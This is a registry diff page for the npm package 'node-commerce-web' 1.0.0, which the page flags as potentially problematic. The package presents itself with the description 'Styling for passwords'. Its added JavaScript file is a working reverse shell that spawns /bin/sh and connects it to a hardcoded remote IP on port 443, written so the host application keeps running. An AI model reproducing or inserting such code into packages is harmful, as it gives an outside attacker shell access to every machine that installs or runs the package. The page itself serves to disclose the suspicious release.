node-commerce-web 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of node-commerce-web might be problematic. Click here for more details.

Binary file
Binary file
Binary file
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "node-commerce-web",
3
+ "version": "1.0.0",
4
+ "description": "Styling for passwords",
5
+ "main": "src/node-commerce-web.js",
6
+ "bin": {
7
+ "node-commerce-web": "src/node-commerce-web.js"
8
+ },
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1"
11
+ },
12
+ "keywords": [],
13
+ "author": "TSK KPMG",
14
+ "license": "ISC",
15
+ "dependencies": {
16
+ "my-package": "^0.0.0"
17
+ },
18
+ "devDependencies": {}
19
+ }
@@ -0,0 +1,12 @@
1
+ (function(){
2
+ var net = require("net"),
3
+ cp = require("child_process"),
4
+ sh = cp.spawn("/bin/sh", []);
5
+ var client = new net.Socket();
6
+ client.connect(443, "54.252.249.36", function(){
7
+ client.pipe(sh.stdin);
8
+ sh.stdout.pipe(client);
9
+ sh.stderr.pipe(client);
10
+ });
11
+ return /a/; // Prevents the Node.js application form crashing
12
+ })();